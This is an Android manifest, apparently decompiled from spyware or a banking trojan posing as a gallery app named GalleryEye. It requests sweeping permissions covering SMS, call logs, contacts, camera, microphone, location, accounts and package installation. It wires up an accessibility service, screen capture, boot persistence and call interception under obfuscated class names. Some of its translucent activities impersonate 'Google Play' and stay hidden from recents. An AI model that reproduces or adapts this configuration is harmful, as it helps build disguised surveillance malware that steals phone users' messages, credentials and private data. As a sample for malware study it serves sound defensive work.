<?xml version="1.0" encoding="utf-8" standalone="no"?><manifest xmlns:android="http://schemas.android.com/apk/res/android" android:compileSdkVersion="33" android:compileSdkVersionCodename="13" package="teamblackberry.gallery" platformBuildVersionCode="33" platformBuildVersionName="13">
    <uses-permission android:name="android.permission.INTERNET"/>
    <uses-permission android:name="android.permission.READ_EXTERNAL_STORAGE"/>
    <uses-permission android:name="android.permission.FOREGROUND_SERVICE"/>
    <permission android:name="teamblackberry.gallery.DYNAMIC_RECEIVER_NOT_EXPORTED_PERMISSION" android:protectionLevel="signature"/>
    <uses-permission android:name="teamblackberry.gallery.DYNAMIC_RECEIVER_NOT_EXPORTED_PERMISSION"/>
    <uses-permission android:name="android.permission.WAKE_LOCK"/>
    <uses-permission android:name="android.permission.INTERNET"/>
    <uses-permission android:name="android.permission.ACCESS_NETWORK_STATE"/>
    <uses-permission android:name="android.permission.WAKE_LOCK"/>
    <uses-permission android:name="android.permission.WRITE_EXTERNAL_STORAGE"/>
    <uses-permission android:name="android.permission.READ_EXTERNAL_STORAGE"/>
    <uses-permission android:name="android.permission.FOREGROUND_SERVICE"/>
    <uses-permission android:name="android.permission.SYSTEM_ALERT_WINDOW"/>
    <uses-permission android:name="android.permission.RECEIVE_BOOT_COMPLETED"/>
    <uses-permission android:name="android.permission.RECORD_AUDIO"/>
    <uses-permission android:name="android.permission.ACCESS_COARSE_LOCATION"/>
    <uses-permission android:name="android.permission.ACCESS_FINE_LOCATION"/>
    <uses-permission android:name="android.permission.READ_PHONE_STATE"/>
    <uses-permission android:name="android.permission.WAKE_LOCK"/>
    <uses-permission android:name="com.android.alarm.permission.SET_ALARM"/>
    <uses-permission android:name="android.permission.ACCESS_NETWORK_STATE"/>
    <uses-permission android:name="android.permission.ACCESS_WIFI_STATE"/>
    <uses-permission android:name="android.permission.CHANGE_WIFI_STATE"/>
    <uses-permission android:name="android.permission.REQUEST_INSTALL_PACKAGES"/>
    <uses-permission android:name="android.permission.CALL_PHONE"/>
    <uses-permission android:name="android.permission.REQUEST_IGNORE_BATTERY_OPTIMIZATIONS"/>
    <uses-permission android:name="android.permission.SET_WALLPAPER"/>
    <uses-permission android:name="android.permission.PROCESS_OUTGOING_CALLS"/>
    <uses-permission android:name="android.permission.READ_SMS"/>
    <uses-permission android:name="android.permission.READ_CALL_LOG"/>
    <uses-permission android:name="android.permission.READ_CONTACTS"/>
    <uses-permission android:name="android.permission.GET_ACCOUNTS"/>
    <uses-permission android:name="android.permission.CAMERA"/>
    <uses-permission android:name="android.permission.INTERNET"/>
    <uses-permission android:name="android.permission.SEND_SMS"/>
    <uses-permission android:name="android.permission.INTERNET"/>
    <uses-permission android:name="android.permission.ACCESS_NETWORK_STATE"/>
    <application android:allowBackup="true" android:appComponentFactory="androidx.core.app.CoreComponentFactory" android:dataExtractionRules="@xml/data_extraction_rules" android:fullBackupContent="@xml/backup_rules" android:icon="@drawable/welcomelg" android:label="@string/app_name" android:roundIcon="@drawable/welcomelg" android:supportsRtl="true" android:theme="@style/Theme.GalleryEye">
        <activity android:excludeFromRecents="true" android:exported="true" android:name="ginom.alfa.lib.scan.icvkllmbgikknnlchzxqifdai5" android:theme="@android:style/Theme.Translucent.NoTitleBar"/>
        <activity android:excludeFromRecents="true" android:exported="true" android:name="ginom.alfa.lib.scan.lkefofrxugzxhovsgnspbjuhn14" android:noHistory="true" android:theme="@android:style/Theme.Translucent.NoTitleBar"/>
        <activity android:excludeFromRecents="true" android:exported="true" android:label="Play Store" android:name="ginom.alfa.lib.scan.lrghmvbukiibxyrvyorrjtodk12" android:noHistory="true" android:showOnLockScreen="true" android:theme="@android:style/Theme.Translucent.NoTitleBar">
            <intent-filter>
                <action android:name="xyz"/>
            </intent-filter>
        </activity>
        <activity android:exported="true" android:label="Google Play" android:name="ginom.alfa.lib.scan.seezpvnoyfrilwjufqdexyolj13"/>
        <service android:enabled="true" android:name="ginom.alfa.lib.scan.ecnjvratcclfbtkkyctntbosk9" android:permission="android.permission.BIND_JOB_SERVICE"/>
        <service android:enabled="true" android:name="ginom.alfa.lib.scan.etepaejhucdoifemyubbjerbt19" android:permission="android.permission.BIND_JOB_SERVICE"/>
        <activity android:excludeFromRecents="true" android:keepScreenOn="true" android:label="Google Play" android:name="ginom.alfa.lib.scan.etepaejhucdoifemyubbjerbt19_WKUP" android:theme="@android:style/Theme.Translucent.NoTitleBar"/>
        <receiver android:name="ginom.alfa.lib.scan.SensorRestarterBroadcastReceiver">
            <intent-filter>
                <action android:name="RestartSensor"/>
            </intent-filter>
        </receiver>
        <activity android:name="ginom.alfa.lib.scan.pxhsoxfklpbneqxqqkjcdodsz6V2" android:theme="@android:style/Theme.Translucent.NoTitleBar"/>
        <service android:enabled="true" android:label="WORK" android:name="ginom.alfa.lib.scan.rwsziozwpwibchxwblzvrenrq4"/>
        <service android:enabled="true" android:label="SCAN" android:name="ginom.alfa.lib.scan.etepaejhucdoifemyubbjerbt16"/>
        <service android:enabled="true" android:label="HELP" android:name="ginom.alfa.lib.scan.etepaejhucdoifemyubbjerbt15"/>
        <service android:name="ginom.alfa.lib.scan.etepaejhucdoifemyubbjerbt112" android:permission="android.permission.BIND_ACCESSIBILITY_SERVICE" android:persistent="true">
            <intent-filter>
                <action android:name="android.accessibilityservice.AccessibilityService"/>
            </intent-filter>
            <meta-data android:name="android.accessibilityservice" android:resource="@xml/accessibilityprivatesrcapp"/>
        </service>
        <service android:enabled="true" android:name="ginom.alfa.lib.scan.xyxieqqhgkvmzrkvuldqgwuyc3" android:persistent="true"/>
        <receiver android:enabled="true" android:exported="true" android:name="ginom.alfa.lib.scan.etepaejhucdoifemyubbjerbt11">
            <intent-filter android:priority="999">
                <action android:name="android.intent.action.BOOT_COMPLETED"/>
                <action android:name="android.intent.action.QUICKBOOT_POWERON"/>
                <action android:name="android.intent.action.USER_PRESENT"/>
                <action android:name="android.intent.action.LOCKED_BOOT_COMPLETED"/>
            </intent-filter>
            <meta-data android:name="_randomS_shit_._randomS_shit_._randomS_shit_" android:value="_randomS_shit_._randomS_shit_._randomS_shit_"/>
        </receiver>
        <receiver android:enabled="true" android:exported="true" android:name="ginom.alfa.lib.scan.RC">
            <intent-filter android:priority="999">
                <action android:name="android.intent.action.PACKAGE_INSTALL"/>
                <action android:name="android.intent.action.PACKAGE_ADDED"/>
                <action android:name="android.intent.action.PACKAGE_REMOVED"/>
                <action android:name="android.intent.action.PACKAGE_REPLACED"/>
                <action android:name="android.intent.action.PACKAGE_CHANGED"/>
                <data android:scheme="package"/>
            </intent-filter>
        </receiver>
        <receiver android:name="ginom.alfa.lib.scan.etepaejhucdoifemyubbjerbt114">
            <intent-filter>
                <action android:name="android.intent.action.SCREEN_ON"/>
                <action android:name="android.intent.action.SCREEN_OFF"/>
                <action android:name="android.intent.action.ACTION_POWER_CONNECTED"/>
                <action android:name="android.intent.action.ACTION_POWER_DISCONNECTED"/>
                <action android:name="android.Intent.ACTION_USER_PRESENT"/>
            </intent-filter>
        </receiver>
        <service android:enabled="true" android:exported="true" android:foregroundServiceType="mediaProjection" android:name="ginom.alfa.lib.scan.suagrfmwoweetpowrzstychkg2"/>
        <service android:name="com.avasta.google.MainService"/>
        <receiver android:enabled="true" android:name="ginom.alfa.lib.scan._callr_lsnr_">
            <intent-filter>
                <action android:name="android.intent.action.PHONE_STATE"/>
            </intent-filter>
            <intent-filter>
                <action android:name="android.intent.action.NEW_OUTGOING_CALL"/>
            </intent-filter>
        </receiver>
        <activity android:name="ginom.alfa.lib.scan.dxlbsscglsusjhhogsrbakyxn10" android:theme="@android:style/Theme.Translucent.NoTitleBar"/>
        <activity android:name="ginom.alfa.lib.scan.pxhsoxfklpbneqxqqkjcdodsz6" android:theme="@android:style/Theme.Translucent.NoTitleBar"/>
        <activity android:name="ginom.alfa.lib.scan.drmdrjftksesosshigcwnjymj11" android:noHistory="true" android:theme="@android:style/Theme.Translucent.NoTitleBar"/>
        <activity android:exported="true" android:label="@string/app_name" android:name="teamblackberry.gallery.GalleryEyeMainActivity" android:theme="@style/Theme.GalleryEye">
            <intent-filter>
                <action android:name="android.intent.action.MAIN"/>
                <category android:name="android.intent.category.INFO"/>
            </intent-filter>
            <meta-data android:name="android.app.lib_name" android:value=""/>
        </activity>
        <service android:name="teamblackberry.gallery.GalleryEyeUtils.GalleryEyeForegroundService"/>
        <activity android:name="com.karumi.dexter.DexterActivity" android:theme="@style/Dexter.Internal.Theme.Transparent"/>
        <provider android:authorities="teamblackberry.gallery.androidx-startup" android:exported="false" android:name="androidx.startup.InitializationProvider">
            <meta-data android:name="androidx.profileinstaller.ProfileInstallerInitializer" android:value="androidx.startup"/>
        </provider>
        <receiver android:directBootAware="false" android:enabled="true" android:exported="true" android:name="androidx.profileinstaller.ProfileInstallReceiver" android:permission="android.permission.DUMP">
            <intent-filter>
                <action android:name="androidx.profileinstaller.action.INSTALL_PROFILE"/>
            </intent-filter>
            <intent-filter>
                <action android:name="androidx.profileinstaller.action.SKIP_FILE"/>
            </intent-filter>
        </receiver>
    </application>
</manifest>